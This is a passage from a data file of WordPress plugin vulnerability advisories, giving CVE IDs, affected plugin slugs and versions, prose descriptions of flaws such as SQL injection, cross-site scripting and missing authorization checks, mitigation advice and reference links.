replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e64e41a1-ea8e-41b4-911c-672caf0d2df1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e64e41a1-ea8e-41b4-911c-672caf0d2df1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/userplus\\\/trunk\\\/admin\\\/admin-ajax.php?rev=1627771#L216\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/userplus\\\/trunk\\\/admin\\\/admin-ajax.php?rev=1627771#L216\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/userplus\\\/trunk\\\/admin\\\/admin-ajax.php?rev=1627771#L225\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/userplus\\\/trunk\\\/admin\\\/admin-ajax.php?rev=1627771#L225\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/userplus\\\/trunk\\\/admin\\\/admin-ajax.php?rev=1627771#L186\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/userplus\\\/trunk\\\/admin\\\/admin-ajax.php?rev=1627771#L186\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10341","slug":"league-of-legends-shortcodes","versionImpact":"1.0.1","description":"The League of Legends Shortcodes plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 1.0.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with contributor-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22ddafad-9214-4d32-9fc3-3f3c759633ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22ddafad-9214-4d32-9fc3-3f3c759633ad?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/league-of-legends-shortcodes\\\/trunk\\\/lol-shortcodes.php?rev=934346#L101\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/league-of-legends-shortcodes\\\/trunk\\\/lol-shortcodes.php?rev=934346#L101\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10883","slug":"simpleform","versionImpact":"2.2.0","description":"The SimpleForm \u2013 Contact form made simple plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.2.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/045f2be3-9a24-4f8b-8a09-8adeb751b218?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/045f2be3-9a24-4f8b-8a09-8adeb751b218?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simpleform\\\/tags\\\/2.2.0\\\/admin\\\/includes\\\/class-simpleform-forms-list.php#L84\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simpleform\\\/tags\\\/2.2.0\\\/admin\\\/includes\\\/class-simpleform-forms-list.php#L84\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7556","slug":"dts-simple-share","versionImpact":"0.5.3","description":"The Simple Share WordPress plugin through 0.5.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/89ccbe24-be15-4b13-883a-48d6da9c8ffa\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/89ccbe24-be15-4b13-883a-48d6da9c8ffa\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4936","slug":"wc-multivendor-marketplace","versionImpact":"3.4.11","description":"The WCFM Marketplace plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.4.11 due to missing nonce checks on various AJAX actions. This makes it possible for unauthenticated attackers to perform a wide variety of actions such as modifying shipping method details, modifying products, deleting arbitrary posts, and more, via a forged request granted they can trick a site's administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2632635%40wc-multivendor-marketplace&new=2632635%40wc-multivendor-marketplace&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2632635%40wc-multivendor-marketplace&new=2632635%40wc-multivendor-marketplace&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c2cc9a3-cd20-4c9e-baa4-1aea69f84331?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c2cc9a3-cd20-4c9e-baa4-1aea69f84331?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2404","slug":"crm-customer-relationship-management-by-vcita","versionImpact":"2.6.2","description":"The CRM and Lead Management by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'email' parameter in versions up to, and including, 2.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with the edit_posts capability, such as contributors and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crm-customer-relationship-management-by-vcita\\\/trunk\\\/vcita-callback.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crm-customer-relationship-management-by-vcita\\\/trunk\\\/vcita-callback.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e26ccd06-22e0-4d91-a53a-df6ead8a8e3b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e26ccd06-22e0-4d91-a53a-df6ead8a8e3b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"name\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4243","slug":"full-customer","versionImpact":"2.2.3","description":"The FULL - Customer plugin for WordPress is vulnerable to Arbitrary File Upload via the \/install-plugin REST route in versions up to, and including, 2.2.3 due to improper authorization. This allows authenticated attackers with subscriber-level permissions and above to execute code by installing plugins from arbitrary remote locations including non-repository sources onto the site, granted they are packaged as a valid WordPress plugin.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9799df3f-e34e-42a7-8a72-fa57682f7014?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9799df3f-e34e-42a7-8a72-fa57682f7014?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/1.1.0\\\/app\\\/api\\\/Plugin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/1.1.0\\\/app\\\/api\\\/Plugin.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/2.2.1\\\/app\\\/api\\\/PluginInstallation.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/2.2.1\\\/app\\\/api\\\/PluginInstallation.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6798","slug":"feedzy-rss-feeds","versionImpact":"4.3.2","description":"The RSS Aggregator by Feedzy \u2013 Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to unauthorized settings update due to a missing capability check when updating settings in all versions up to, and including, 4.3.2. This makes it possible for authenticated attackers, with author-level access or above to change the plugin's settings including proxy settings, which are also exposed to authors.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2cdf4e5-0a40-42ca-b5ac-78511fdd2b77?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2cdf4e5-0a40-42ca-b5ac-78511fdd2b77?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3012392%40feedzy-rss-feeds%2Ftrunk&old=2991547%40feedzy-rss-feeds%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3012392%40feedzy-rss-feeds%2Ftrunk&old=2991547%40feedzy-rss-feeds%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0616","slug":"content-protector","versionImpact":"4.2.6.2","description":"The Passster \u2013 Password Protect Pages and Content plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.2.6.2 via API. This makes it possible for unauthenticated attackers to obtain post titles, slugs, IDs, content and other metadata including passwords of password-protected posts and pages.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00b81467-8d00-4816-895a-89d67c541c17?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00b81467-8d00-4816-895a-89d67c541c17?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3032195%40content-protector%2Ftrunk&old=3020439%40content-protector%2Ftrunk&sfp_email=&sfph_mail=#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3032195%40content-protector%2Ftrunk&old=3020439%40content-protector%2Ftrunk&sfp_email=&sfph_mail=#file3\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3066","slug":"elegant-addons-for-elementor","versionImpact":"1.0.8","description":"The Elegant Addons for elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 1.0.8 due to insufficient input sanitization and output escaping on user supplied tag attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/affa8b39-94b8-474d-9310-a93ebdb7c1b8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/affa8b39-94b8-474d-9310-a93ebdb7c1b8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elegant-addons-for-elementor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elegant-addons-for-elementor\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5424","slug":"simply-gallery-block","versionImpact":"3.2.1","description":"The Gallery Blocks with Lightbox. Image Gallery, (HTML5 video , YouTube, Vimeo) Video Gallery and Lightbox for native gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018galleryID\u2019 and 'className' parameters in all versions up to, and including, 3.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e7bd708-2e82-4fef-85f2-bf4f56f66bc4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e7bd708-2e82-4fef-85f2-bf4f56f66bc4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-gallery-block\\\/trunk\\\/blocks\\\/init.php#L127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-gallery-block\\\/trunk\\\/blocks\\\/init.php#L127\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-gallery-block\\\/trunk\\\/blocks\\\/init.php#L132\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-gallery-block\\\/trunk\\\/blocks\\\/init.php#L132\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-gallery-block\\\/trunk\\\/blocks\\\/init.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-gallery-block\\\/trunk\\\/blocks\\\/init.php#L70\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107152\\\/simply-gallery-block\\\/trunk\\\/blocks\\\/init.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107152\\\/simply-gallery-block\\\/trunk\\\/blocks\\\/init.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simply-gallery-block\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simply-gallery-block\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1604","slug":"shorten-url","versionImpact":"1.6.8","description":"The Short URL plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.6.8. This is due to missing or incorrect nonce validation on the configuration_page function. This makes it possible for unauthenticated attackers to add and import redirects, including comments containing cross-site scripting as detailed in CVE-2023-1602, granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b926243c-ed12-4afe-ac72-932d4d871019?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b926243c-ed12-4afe-ac72-932d4d871019?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shorten-url\\\/trunk\\\/shorten-url.php#L322\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shorten-url\\\/trunk\\\/shorten-url.php#L322\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9074","slug":"advanced-blocks-pro","versionImpact":"1.0.0","description":"The Advanced Blocks Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f419d14a-90d1-445a-b629-c2e978c3ab81?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f419d14a-90d1-445a-b629-c2e978c3ab81?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-blocks-pro\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-blocks-pro\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10150","slug":"bamazoo-button-generator","versionImpact":"1.0","description":"The Bamazoo \u2013 Button Generator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's dgs shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/543507a1-02de-417f-a742-7764465987b2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/543507a1-02de-417f-a742-7764465987b2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bamazoo-button-generator\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bamazoo-button-generator\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10875","slug":"fancy-gallery","versionImpact":"1.6.58","description":"The Gallery Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_Query_Arg without appropriate escaping on the URL in all versions up to, and including, 1.6.58. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63ff56cf-0b64-491f-8629-8b7738adee10?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63ff56cf-0b64-491f-8629-8b7738adee10?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fancy-gallery\\\/trunk\\\/options-page\\\/options-page.php#L25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fancy-gallery\\\/trunk\\\/options-page\\\/options-page.php#L25\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11095","slug":"visualmodo-elements","versionImpact":"1.0.2","description":"The Visualmodo Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/visualmodo-elements\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/visualmodo-elements\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49005688-fa40-458d-9c96-5ec2ca7adcd3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49005688-fa40-458d-9c96-5ec2ca7adcd3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11382","slug":"common-ninja","versionImpact":"1.1.0","description":"The Common Ninja: Fully Customizable & Perfectly Responsive Free Widgets for WordPress Websites plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'commonninja' shortcode in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/common-ninja\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/common-ninja\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1205432-4de0-4745-b8d5-e36aa8f3da49?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1205432-4de0-4745-b8d5-e36aa8f3da49?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13099","slug":"widget4call","versionImpact":"1.0.7","description":"The Widget4Call WordPress plugin through 1.0.7 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0cabf5c-7b01-4163-834b-a134db3a90b4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0cabf5c-7b01-4163-834b-a134db3a90b4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1768","slug":"squirrly-seo","versionImpact":"12.4.05","description":"The SEO Plugin by Squirrly SEO plugin for WordPress is vulnerable to blind SQL Injection via the 'search' parameter in all versions up to, and including, 12.4.05 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/controllers\\\/Assistant.php?rev=3207037#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/controllers\\\/Assistant.php?rev=3207037#L55\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/controllers\\\/Audits.php?rev=3207037#L86\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/controllers\\\/Audits.php?rev=3207037#L86\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/controllers\\\/BulkSeo.php?rev=3207037#L148\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/controllers\\\/BulkSeo.php?rev=3207037#L148\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/controllers\\\/FocusPages.php?rev=3207037#L107\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/controllers\\\/FocusPages.php?rev=3207037#L107\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/controllers\\\/Onboarding.php?rev=3207037#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/controllers\\\/Onboarding.php?rev=3207037#L62\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/controllers\\\/Post.php?rev=3207037#L480\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/controllers\\\/Post.php?rev=3207037#L480\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/models\\\/Snippet.php?rev=3207037#L118\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/models\\\/Snippet.php?rev=3207037#L118\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/models\\\/Snippet.php?rev=3207037#L96\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squirrly-seo\\\/trunk\\\/models\\\/Snippet.php?rev=3207037#L96\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3248412\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3248412\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250395\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250395\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/squirrly-seo\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/squirrly-seo\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a23ee5c-275f-4d51-8199-1cc2b0086f73?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a23ee5c-275f-4d51-8199-1cc2b0086f73?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4588","slug":"360-sphere-images","versionImpact":"1.3","description":"The 360 Photo Spheres plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sphere' shortcode in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/360-sphere-images\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/360-sphere-images\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a654ee62-8742-49bc-95fd-bfab14750b50?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a654ee62-8742-49bc-95fd-bfab14750b50?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4935","slug":"wc-multivendor-marketplace","versionImpact":"3.4.11","description":"The WCFM Marketplace plugin for WordPress is vulnerable to unauthorized modification and access of data in versions up to, and including, 3.4.11 due to missing capability checks on various AJAX actions. This makes it possible for authenticated attackers, with minimal permissions such as subscribers, to perform a wide variety of actions such as modifying shipping method details, modifying products, deleting arbitrary posts, and privilege escalation (via the wp_ajax_wcfm_vendor_store_online AJAX action).","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2630696%40wc-multivendor-marketplace&new=2630696%40wc-multivendor-marketplace&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2630696%40wc-multivendor-marketplace&new=2630696%40wc-multivendor-marketplace&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85730e9b-c5da-473c-a324-891c5c9f7ba3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85730e9b-c5da-473c-a324-891c5c9f7ba3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
